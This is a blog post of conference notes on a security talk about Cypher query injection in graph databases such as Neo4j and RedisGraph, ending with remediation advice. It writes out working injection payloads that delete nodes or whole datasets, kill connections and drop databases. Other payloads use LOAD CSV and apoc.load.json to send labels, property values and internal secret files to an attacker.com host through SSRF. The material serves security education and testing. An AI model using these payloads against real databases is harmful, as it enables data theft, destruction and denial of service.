Conference notes: Cypher Query Injection - the new “SQL Injection”

Posted in Conference notes on November 29, 2022

Hi! This week’s conf’notes are from ‘Cypher Query Injection - the new “SQL Injection” we aren’t aware of’ by Noy Pearl at BSides TLV and BSides Orlando.

TL;DR

This in an excellent introduction to Cypher injection in graph databases like Neo4j. Noy Pearl breaks down everything from the basics to advanced exploitation, sharing her own research and a playground for practice.

Intro to Cypher & Graph Databases

What is Cypher?

Cypher is short for (Open) Cypher Query Language
It’s commonly used in Graph databases

Comments

Cypher is Neo4j’s graph query language that lets you retrieve data from the graph. It’s like SQL for graphs.
It was originally intended to be used with Neo4j, but was opened up through the openCypher project. It is now used by many other databases including RedisGraph, Spark, Amazon Neptune and SAP HANA Graph.
Cypher Query Language Reference, Version 9

What is a Graph database?

	Relational database	Graph database
Vendor examples	MySQL, Microsoft SQL Server	Neo4j, RedisGraph, Amazon Neptune
What it looks like	Tables, rows, columns:	Graphs, nodes, relationships: )

Graph example:

What is a Cypher Query?

Terms:

Node, Relationship & Node:

Variable, Label & Property:

Query example:

MATCH and RETURN are the equivalent of SELECT FROM in SQL
Get all Characters:

MATCH (c:Character) RETURN

Get Character by name:

MATCH (c:Character)
WHERE c.name = 'Spongebob'
RETURN c

Cypher injection

Basic SQL injection

Vulnerable query

SELECT * FROM "characters" WHERE name = "Spongebob"

returns:

Injection
If name is based on user input, injecting Spongebob" OR 1=1-- will change the query to:

SELECT * FROM "characters" WHERE name = "Spongebob" OR 1=1--"

It’ll return:

Basic Cypher injections

MATCH By Name - Vulnerable query

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c Spongebob

// E.g. return the node that has the name Spongebob:
MATCH (c:Character)
WHERE c.name = 'Spongebob' RETURN c

MATCH By Name injection - Return all
Injecting Spongebob' or 1=1 RETURN c// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' or 1=1 RETURN c//' RETURN c

which returns all nodes.

This is the equivalent of the previous SQL injection example.

Problem
In order to inject RETURN c, we need to know there is a variable called c (but more that in a sec).

MATCH By Name injection - Delete node
Vulnerable query:

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c Spongebob

Injecting Spongebob' DELETE c//will change the query to:

MATCH (c:Character)
WHERE c.name ='Spongebob' DELETE c//' RETURN c

which deletes the node.

MATCH By Name injection - Delete everything
Vulnerable query:

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c Spongebob

Injecting Spongebob' MATCH (all:Character) DELETE all// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob'
MATCH (all:Character)
DELETE all//'
RETURN c

We inserted two clauses (MATCH & DELETE). This creates a variable called all to get all the nodes that have a label called Character, then deletes them.

Problem
In blackbox testing, we can’t see the query. So we don’t know that there is a label Character.
The solution is to leak this data by leveraging a legitimate Neo4j functionality called LOAD CSV:

Data exfiltration via LOAD CSV in Neo4j

We’re basically trying to exploit a blind Cypher injection, which is when we’re able to inject into a query but don’t see the reply

LOAD CSV

Used to import data from CSV files (possibly from external files)
Syntax: LOAD CSV FROM https://your-website/data.csv
Interesting because it sends a GET request to an external service (that we can define)
So it enables leaking data from the database to a server we control

Using LOAD CSV to leak Labels

Payload to leak all labels:

CALL db.labels() YIELD label
LOAD CSV FROM 'https://attacker.com/'+label
AS b RETURN b//

What this does:

Calls the procedure db.labels() which returns all labels in the database
Uses LOAD CSV & appends the label at the end of the URL. This sends a GET request to our server with the leaked label in the path (one request sent for each label):

Notice the User-Agent is NeoLoadCSV_Java.

Using LOAD CSV to leak Properties

We know there is a label called Character.
Payload to leak its properties:

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+apoc.text.join(keys(c), '')
AS b RETURN b//

What this does:

Uses keys() to return all properties of nodes that have a label Character
Uses apoc.text.join to transform the list into a string (so we can append it at the end of the URL)
Uses LOAD CSV to send all the properties to your server (a GET request is sent for each property)

Using LOAD CSV to leak Values of a Property

We know there is a label called Character & a property called name.
Payload to leak the names (i.e. values of the property name):

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+c.name
AS b RETURN b//

Attack escalation

Denial of Service - Preventing access to the database

Leak & Kill connections

Call dbms.listConnections() to get all connection IDs:

CALL dbms.listConnections()

Use LOAD CSV to leak them to your server
Kill the connection with dbms.killConnection:

CALL dbms.killConnection("bolt-9276")

Or kill a list of connections with dbms.killConnections:

CALL dbms.killConnections(["bolt-9276", "bolt-9273"])

Impact:

We’re killing the connections between the server and the database (it’s not a client-side attack).
So using an automated script, we could prevent queries of legitimate users from being executed, leading to DoS.
But it’ll depend on the role & permissions you have when injecting. If your role is admin, you’ll be able to perform this DoS attack with a simple injection with LOAD CSV.

Drop database

List all databases:

SHOW databases

Use LOAD CSV to leak their names to your server
Drop databases:

DROP database spongebob

SSRF & RFI - Accessing sensitive endpoints & files

Leveraging LOAD CSV for SSRF

Cypher injection can be exploited for SSRF
By injecting LOAD CSV FROM <url-of-internal-server>, you can make the vulnerable server send requests to internal servers and access hidden endpoints, enumerate directories and files, leak data to your server, etc

Lateral movement in the cloud

Use LOAD CSV FROM to query the AWS metadata service to find out to which other machine(s) you can escalate your attack
If you can query the secret manager of AWS, you can also get a lot of sensitive files and passwords from that
But this only works in IMDSv1
IMDSv2 requires passing a session token via the HTTP request header X-aws-ec2-metadata-token, to allow queries to the AWS metadata service. Noy didn’t find a way to include this token in GET requests sent by LOAD CSV FROM.

Leak secrets through SSRF

Let’s say there is an internal endpoint that hosts a sensitive file:

Cypher injection can be exploited to leak the secret in this file:

LOAD CSV FROM "http://localhost:3030/internal-api/keys.txt"
AS secret
LOAD CSV FROM "http://attacker.com/"+secret[0]
AS LINE RETURN secret[0]//

What this does:

The first LOAD CSV FROM gets the secret file from the other server, and saves it as secret
The second LOAD CSV FROM sends a request to our server, with the request appended at the end

Note that:

This works even if the Neo4j database and the sensitive file are hosted on different servers
The filetype doesn’t matter (it doesn’t have to be CSV)

Responsible disclosure to Neo4j

Noy alerted Neo4j about the risks of having LOAD CSV enabled because there is no way to disable it
They’re working on a solution but it’s not simple: LOAD CSV is defined as a clause not a function, and it is not possible to disable clauses (while it is possible to disable functions)

Alternative to LOAD CSV

Neo4j APOC Library extends the functionality and Cypher language of Neo4j databases
It provides more features including procedures to Import / Load and Export data
apoc.load.json can be used if LOAD CSV is blocked to leak the same information:

MATCH (c:Character)
CALL apoc.load.json("https://attacker.com/data.json?leaked="+c.name)
YIELD value RETURN value//

This requires that APOC is installed in the database. Chances are it will be since APOC is considered the largest and most common Neo4j library

Remediation & Mitigation

Remediation

Use Parameterized Queries

// Not vulnerable (parameterized query)
session.run("MATCH (c:Character)
WHERE c.name = $name RETURN c", {name: name})

// Vulnerable (string concatenated with Cyper query)
session.run("MATCH (c:Character)
WHERE c.name '" + name + "' + RETURN c)

Mitigations

Neo4j supports RBAC - users, roles & privileges
- Read / write
- Built-in granular roles - PUBLIC, reader, editor, publisher, … admin
- Revoke privileges from roles
- Hardening capabilities per-user
Disable/blocklist Apoc procedures (like LOAD, IMPORT, EXPORT…) in neo4j.conf (since version 4.3)
Uninstall APOC if it’s not used

RedisGraph

Extension to Redis that enables writing Cypher queries
Supports some procedures (e.g. db.labels)
Supports substrings
No equivalent of LOAD CSV, but CASE WHEN can be used for Cypher injection (if-based, with OR 1=2)
- E.g. get labels with db.labels and check wether the first letter equals ‘a’ (using OR 1=2 to get the result if it’s blind injection)
Supports parameterized queries
Doesn’t support RBAC

What now

Practice: cypher-playground
Fix existing injections in your apps & Reduce attack surface
Hunt for Cypher injection on bug bounty ptograms

Resources

Conference notes Bug bounty Web hacking

Conference notes: Cypher Query Injection - the new “SQL Injection”

Links

TL;DR

Intro to Cypher & Graph Databases

What is Cypher?

What is a Graph database?

What is a Cypher Query?

Cypher injection

Basic SQL injection

Basic Cypher injections

Data exfiltration via LOAD CSV in Neo4j

Blind Cypher injection

LOAD CSV

Using LOAD CSV to leak Labels

Using LOAD CSV to leak Properties

Using LOAD CSV to leak Values of a Property

Attack escalation

Denial of Service - Preventing access to the database

SSRF & RFI - Accessing sensitive endpoints & files

Responsible disclosure to Neo4j

Alternative to LOAD CSV

Remediation & Mitigation

RedisGraph

What now

Resources

Sponsored by

Conference notes: Cypher Query Injection - the new “SQL Injection”

Links #

TL;DR #

Intro to Cypher & Graph Databases #

What is Cypher? #

What is a Graph database? #

What is a Cypher Query? #

Cypher injection #

Basic SQL injection #

Basic Cypher injections #

Data exfiltration via LOAD CSV in Neo4j #

Blind Cypher injection #

LOAD CSV #

Using LOAD CSV to leak Labels #

Using LOAD CSV to leak Properties #

Using LOAD CSV to leak Values of a Property #

Attack escalation #

Denial of Service - Preventing access to the database #

SSRF & RFI - Accessing sensitive endpoints & files #

Responsible disclosure to Neo4j #

Alternative to LOAD CSV #

Remediation & Mitigation #

RedisGraph #

What now #

Resources #

Related posts

Conference notes: How to Differentiate Yourself as a Bug Bounty Hunter (OWASP Stockholm)

Conference notes: Practical recon techniques for bug hunters & pen testers (LevelUp 0x02 / 2018)

Conference notes: Automation for Bug Hunters (Bug Bounty Talks)

Links

TL;DR

Intro to Cypher & Graph Databases

What is Cypher?

What is a Graph database?

What is a Cypher Query?

Cypher injection

Basic SQL injection

Basic Cypher injections

Data exfiltration via LOAD CSV in Neo4j

Blind Cypher injection

LOAD CSV

Using LOAD CSV to leak Labels

Using LOAD CSV to leak Properties

Using LOAD CSV to leak Values of a Property

Attack escalation

Denial of Service - Preventing access to the database

SSRF & RFI - Accessing sensitive endpoints & files

Responsible disclosure to Neo4j

Alternative to LOAD CSV

Remediation & Mitigation

RedisGraph

What now

Resources